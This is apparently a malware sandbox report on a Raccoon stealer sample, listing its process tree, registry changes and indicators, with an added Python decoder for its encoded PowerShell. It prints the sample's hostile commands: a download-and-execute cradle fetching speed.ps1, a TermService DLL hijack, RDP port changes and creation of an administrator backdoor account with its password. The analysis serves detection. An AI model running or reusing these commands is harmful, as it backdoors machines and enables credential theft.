Analysis
- max time kernel: 73s
- max time network: 134s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 02-06-2021 17:28

Static task: static1
Behavioral task: behavioral1
- Sample: e9f7040390e3052baacd0e25e6186e01.exe
- Resource: win7v20210410
Behavioral task: behavioral2
- Sample: e9f7040390e3052baacd0e25e6186e01.exe
- Resource: win10v20210408

The signatures, process tree and dropped files below come from the windows10_x64 run (resource win10v20210408, i.e. behavioral2).
General
- Target: e9f7040390e3052baacd0e25e6186e01.exe
- Size: 567KB
- MD5: e9f7040390e3052baacd0e25e6186e01
- SHA1: f0df3a95add27f0c8482a33fb3ee2998a73adfb3
- SHA256: 2c5105d428486ab9bd43df850f2b74e9250769976662bc9937128ce0ff6257b0
- SHA512: 6e3fa85236d0b75fe59d31749ab3e8bfab3652813a71575244f8b3e2312df4eca6a14c54612223b98bee31922aa78b00df71824b0208f64744661c5693282263
Malware Config
Extracted
- URL: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
- Family: raccoon
- e46634757936706c1ff491585768dd6fe231db30
- url4cnc: https://tttttt.me/jdiamond13

The url4cnc value is how Raccoon locates its C2: it fetches this Telegram channel page (tttttt.me is a Telegram mirror domain) and parses the real C2 address out of it, so the Telegram URL is the durable indicator and the C2 host can change without the sample changing.
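The GitHub URL in the extracted config also appears, base64-encoded, as the -enc argument of the cmd / cmd / powershell chain near the end of the process tree. The following is an added example, not part of this sandbox report: it decodes that argument (PowerShell's -EncodedCommand is base64 over UTF-16LE text), pulls the URL out of the result, and classifies the script as a download-and-execute cradle. The encoded string is copied verbatim from the tree; the cradle heuristic (fetch keyword plus IEX/Invoke-Expression) is the example's own.

```python
"""Decode a PowerShell -EncodedCommand argument and pull out what it fetches.

Added example; the encoded string below is copied verbatim from the
cmd -> cmd -> powershell chain in this report's process tree.
"""
from __future__ import annotations

import base64
import re

# -enc argument from the process tree (page data, not constructed).
ENC_COMMAND = (
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkA"
    "LgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcA"
    "aQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMA"
    "cQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA"
)

# Anything that looks like an absolute http(s) URL; quotes and parentheses end it.
URL_RE = re.compile(r"""https?://[^\s"'()]+""", re.IGNORECASE)


def decode_encoded_command(enc: str) -> str:
    """-EncodedCommand is base64 over the script encoded as UTF-16LE.

    Base64 padding is restored in case the argument was copied from a log
    that trimmed trailing '=' characters.
    """
    padded = enc + "=" * (-len(enc) % 4)
    return base64.b64decode(padded).decode("utf-16-le")


def extract_urls(script: str) -> list[str]:
    """URLs referenced by the decoded script, in order of appearance."""
    return URL_RE.findall(script)


def is_download_cradle(script: str) -> bool:
    """True when remote content is fetched and handed straight to
    Invoke-Expression, which is the shape of the command in this report."""
    s = script.lower()
    fetches = any(k in s for k in ("downloadstring", "downloaddata",
                                   "invoke-webrequest", "net.webclient"))
    evaluates = "invoke-expression" in s or re.search(r"\biex\b", s) is not None
    return fetches and evaluates


if __name__ == "__main__":
    script = decode_encoded_command(ENC_COMMAND)
    print(script)
    print("urls:", extract_urls(script))
    print("download cradle:", is_download_cradle(script))
```

Decoding yields `IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1")`, which is the first "Extracted" entry above. The same decoder applies to any `-enc`/`-EncodedCommand` argument found in 4688 or Sysmon command-line telemetry; remember the decoded text is itself a script that may contain a second encoded layer.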
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes (flow, pid, process):
- flow 20, pid 3992, powershell.exe
- flow 22, pid 3992, powershell.exe
- flow 23, pid 3992, powershell.exe
- flow 24, pid 3992, powershell.exe
- flow 26, pid 3992, powershell.exe
- flow 28, pid 3992, powershell.exe
- flow 30, pid 3992, powershell.exe
- flow 32, pid 3992, powershell.exe
- flow 34, pid 3992, powershell.exe
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
- pid 1972, b2EP0a91ph.exe
Modifies RDP port number used by Windows 1 TTPs
reg.exe sets HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber to 0x1C21 (7201); see the process tree.
-
Sets DLL path for service in the registry 2 TTPs
reg.exe sets HKLM\system\currentcontrolset\services\TermService\parameters\ServiceDLL to C:\Windows\branding\mediasrv.png; see the process tree.
-
UPX packed file
Resources matching yara rule "upx":
- \Windows\Branding\mediasrv.png
- \Windows\Branding\mediasvc.png
-
Loads dropped DLL 3 IoCs
Processes:
- pid 808, e9f7040390e3052baacd0e25e6186e01.exe
- pid 3112 (image name not reported)
- pid 3112 (image name not reported)
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 4 IoCs
Processes (all powershell.exe):
- File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT
- File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI
- File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT
- File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI
-
Drops file in Windows directory 19 IoCs
Processes (all powershell.exe):
- File created: C:\Windows\branding\mediasrv.png
- File created: C:\Windows\branding\mediasvc.png
- File opened for modification: C:\Windows\branding\ShellBrd
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5420.tmp
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
- File created: C:\Windows\branding\wupsvc.jpg
- File opened for modification: C:\Windows\branding\wupsvc.jpg
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI53B0.tmp
- File opened for modification: C:\Windows\branding\Basebrd
- File opened for modification: C:\Windows\branding\mediasvc.png
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_xgsdbdpn.px5.psm1
- File created: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5312.tmp
- File opened for modification: C:\Windows\branding\mediasrv.png
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_drytqczp.dbv.ps1
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI53C0.tmp
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI53F0.tmp
- File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat

The ServiceProfiles\NetworkService paths (SERVIC~2\NETWOR~1 is the same directory in 8.3 form) show that this PowerShell instance runs as NT AUTHORITY\NETWORK SERVICE, not as the logged-on user.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox's generic description calls this likely ransomware behaviour; nothing else in this report points to file encryption, and for a stealer/RDP-backdoor sample drive enumeration is more plausibly reconnaissance.
-
Delays execution with timeout.exe 1 IoCs
Processes:
- pid 2272, timeout.exe
-
Modifies data under HKEY_USERS 64 IoCs
All keys are under \REGISTRY\USER\S-1-5-20\Software\ (S-1-5-20 is the well-known SID of NT AUTHORITY\NETWORK SERVICE, the account the second-stage PowerShell runs under). Process is powershell.exe unless noted.
- Key created: Policies\Microsoft\SystemCertificates\CA\CRLs
- Key created: Microsoft\SystemCertificates\TrustedPeople
- Key created: Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016"
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"
- Key created: Microsoft\Advanced INF Setup\IE.HKCUZoneInfo
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ (default value)
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"
- Key created: Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
- Key created: Microsoft\SystemCertificates\TrustedPeople\CTLs
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"
- Key created: Microsoft\SystemCertificates\Disallowed
- Key created: Microsoft\SystemCertificates\SmartCardRoot\CTLs
- Key created: Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ (default value)
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"
- Key created: Microsoft\SystemCertificates\trust\CTLs
- Key created: Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."
- Key created: Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (process: WMIC.exe)
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1"
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"
- Key created: Microsoft\SystemCertificates\TrustedPeople\CRLs
- Key created: Microsoft\SystemCertificates\trust\Certificates
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ (default value)
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"
- Key created: Microsoft\SystemCertificates\Disallowed\CTLs
- Key created: Microsoft\Advanced INF Setup
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"
- Key created: Classes\Local Settings\MuiCache\16\52C64B7E
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites"
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."
- Key created: Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"
- Key created: Policies\Microsoft\SystemCertificates\trust
- Key created: Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
- Key created: Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
- Set value (int): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"
- Key created: Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ (default value)
- Set value (str): Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"

These Internet Settings zone and SystemCertificates keys are what Windows populates the first time a WinINet/WinHTTP client runs under a fresh profile; their presence under S-1-5-20 is a side effect of the NETWORK SERVICE profile being used for the first time, not configuration the malware sets deliberately.
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes (HTTP User-Agent header per flow):
- flow 22: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- flow 23: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- flow 24: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- flow 26: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

This is the default User-Agent of the WinHttp.WinHttpRequest.5.1 COM object, so these four flows were made through WinHTTP from script rather than through .NET's WebClient.
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes (pid, process, number of events):
- 2052, powershell.exe (3)
- 1148, powershell.exe (3)
- 3100, powershell.exe (3)
- 3348, powershell.exe (3)
- 2052, powershell.exe (3)
- 3992, powershell.exe (3)
-
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
- pid 624 (image name not reported)
- pid 624 (image name not reported)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (privileges enabled per pid, in the order recorded):
- pid 2052, powershell.exe: SeDebugPrivilege
- pid 1148, powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- pid 3100, powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- pid 3348, powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33 (list truncated at the 64-row cap)

The numeric entries are privilege LUIDs the sandbox did not resolve to names: 33 SeIncreaseWorkingSetPrivilege, 34 SeTimeZonePrivilege, 35 SeCreateSymbolicLinkPrivilege, 36 SeDelegateSessionUserImpersonatePrivilege. Enabling the whole set at once is what an elevated process does when it calls AdjustTokenPrivileges for every privilege in its token; the one that matters operationally is SeDebugPrivilege.
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes (parent pid/image -> child pid/image, with the number of write events recorded):
- 808 e9f7040390e3052baacd0e25e6186e01.exe -> 1972 b2EP0a91ph.exe (2)
- 808 e9f7040390e3052baacd0e25e6186e01.exe -> 3364 cmd.exe (3)
- 3364 cmd.exe -> 2272 timeout.exe (3)
- 1972 b2EP0a91ph.exe -> 2052 powershell.exe (2)
- 2052 powershell.exe -> 3240 csc.exe (2)
- 3240 csc.exe -> 3708 cvtres.exe (2)
- 2052 powershell.exe -> 1148 powershell.exe (2)
- 2052 powershell.exe -> 3100 powershell.exe (2)
- 2052 powershell.exe -> 3348 powershell.exe (2)
- 2052 powershell.exe -> 1504 reg.exe (2)
- 2052 powershell.exe -> 2076 reg.exe (2)
- 2052 powershell.exe -> 2940 reg.exe (2)
- 2052 powershell.exe -> 2284 net.exe (2)
- 2284 net.exe -> 2680 net1.exe (2)
- 2052 powershell.exe -> 3240 cmd.exe (2)
- 3240 cmd.exe -> 3144 cmd.exe (2)
- 3144 cmd.exe -> 2252 net.exe (2)
- 2252 net.exe -> 2700 net1.exe (2)
- 2052 powershell.exe -> 544 cmd.exe (2)
- 544 cmd.exe -> 3272 cmd.exe (2)
- 3272 cmd.exe -> 808 net.exe (2)
- 808 net.exe -> 2620 net1.exe (2)
- 1632 cmd.exe -> 3660 net.exe (2)
- 3660 net.exe -> 2016 net1.exe (2)
- 3844 cmd.exe -> 3708 net.exe (2)
- 3708 net.exe -> 2272 net1.exe (2)
- 3180 cmd.exe -> 3432 net.exe (2)
- 3432 net.exe -> 2884 net1.exe (2)
- 3344 cmd.exe -> 2768 net.exe (2)
- 2768 net.exe -> 1204 net1.exe (2)
- 1408 cmd.exe -> 3500 net.exe (2)

PIDs are reused within the run (808, 2272, 3240 and 3708 each appear for more than one image), so pivot on pid plus image name, never on pid alone. These writes are the normal parent-to-child writes CreateProcess performs, which is why the tag appears on every cmd.exe and net.exe in the chain.
Processes
Depth markers ([1], [2], ...) are the nesting level from the original tree; children are indented under their parent. "Flags" are the signature names the sandbox attached to that process.

- [1] C:\Users\Admin\AppData\Local\Temp\e9f7040390e3052baacd0e25e6186e01.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\e9f7040390e3052baacd0e25e6186e01.exe"
  Flags: Loads dropped DLL; Suspicious use of WriteProcessMemory
  - [2] C:\Users\Admin\AppData\Local\Temp\b2EP0a91ph.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\b2EP0a91ph.exe"
    Flags: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      Flags: Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wqatwvkc\wqatwvkc.cmdline"
        Flags: Suspicious use of WriteProcessMemory
        Note: csc.exe spawned by PowerShell is the Add-Type pattern (C# compiled on the fly); the resulting wqatwvkc.dll, its .cs source and the .cmdline response file are hashed under Downloads.
        - [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFD03.tmp" "c:\Users\Admin\AppData\Local\Temp\wqatwvkc\CSC446953FD1A4041BE8C3F48E23DEBDDFA.TMP"
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (three separate instances with identical command lines; pids 1148, 3100 and 3348 per the signature tables)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        Flags (each): Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
        Note: this is the command line of the server-mode (-s) child that Start-Job creates, so ready.ps1 ran at least three background jobs.
      - [4] C:\Windows\system32\reg.exe
        Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        Note: 0x1C21 = 7201; the RDP listener is moved off TCP/3389 so that scans and firewall rules keyed on the default port miss it.
      - [4] C:\Windows\system32\reg.exe
        Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        Flags: Modifies registry key
        Note: this repoints the Remote Desktop service (TermService, hosted by svchost.exe) at the dropped C:\Windows\branding\mediasrv.png, which is a UPX-packed PE and not an image (see the yara match above and its hashes under Downloads). The legitimate value is %SystemRoot%\System32\termsrv.dll.
      - [4] C:\Windows\system32\reg.exe
        Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
        Note: disables the WDDM graphics driver for Remote Desktop sessions (the "Use WDDM graphics display driver for Remote Desktop Connections" policy), forcing the legacy XDDM driver that replacement termsrv builds typically require.
      - [4] C:\Windows\system32\net.exe
        Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        Flags: Suspicious use of WriteProcessMemory
        Note: TermService runs as NETWORK SERVICE, so this gives the hijacked service DLL local administrator rights; it is also why the registry writes above land under S-1-5-20 and the dropped files under ServiceProfiles\NetworkService.
        - [5] C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      - [4] C:\Windows\system32\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        Flags: Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\cmd.exe
          Command line: cmd /c net start rdpdr
          Flags: Suspicious use of WriteProcessMemory
          - [6] C:\Windows\system32\net.exe
            Command line: net start rdpdr
            Flags: Suspicious use of WriteProcessMemory
            - [7] C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 start rdpdr
      - [4] C:\Windows\system32\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        Flags: Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\cmd.exe
          Command line: cmd /c net start TermService
          Flags: Suspicious use of WriteProcessMemory
          - [6] C:\Windows\system32\net.exe
            Command line: net start TermService
            Flags: Suspicious use of WriteProcessMemory
            - [7] C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 start TermService
      - [4] C:\Windows\system32\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
      - [4] C:\Windows\system32\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
        Note: the two del commands remove ready.ps1 and any text artefacts from %TEMP% once the service hijack is in place; the Downloads section below preserves ready.ps1's hashes.
  - [2] C:\Windows\SysWOW64\cmd.exe
    Command line: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\e9f7040390e3052baacd0e25e6186e01.exe"
    Flags: Suspicious use of WriteProcessMemory
    Note: self-deletion of the original dropper after a 10-second delay.
    - [3] C:\Windows\SysWOW64\timeout.exe
      Command line: timeout /T 10 /NOBREAK
      Flags: Delays execution with timeout.exe

The following trees start at depth 1 because the report records no parent for them; they run after the TermService hijack and the speed.ps1 download described below, and together they provision the RDP backdoor account.

- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user wgautilacc Ghar4f5 /del
  Flags: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe user wgautilacc Ghar4f5 /del
    Flags: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user wgautilacc 6O7xHmag /add
  Flags: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe user wgautilacc 6O7xHmag /add
    Flags: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user wgautilacc 6O7xHmag /add
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  Flags: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    Flags: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  Flags: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    Flags: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  Flags: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user wgautilacc 6O7xHmag
  - [2] C:\Windows\system32\net.exe
    Command line: net.exe user wgautilacc 6O7xHmag
    - [3] C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user wgautilacc 6O7xHmag
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic path win32_VideoController get name
  - [2] C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic path win32_VideoController get name
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic CPU get NAME
  - [2] C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic CPU get NAME
    Flags: Modifies data under HKEY_USERS
- [1] C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - [2] C:\Windows\system32\cmd.exe
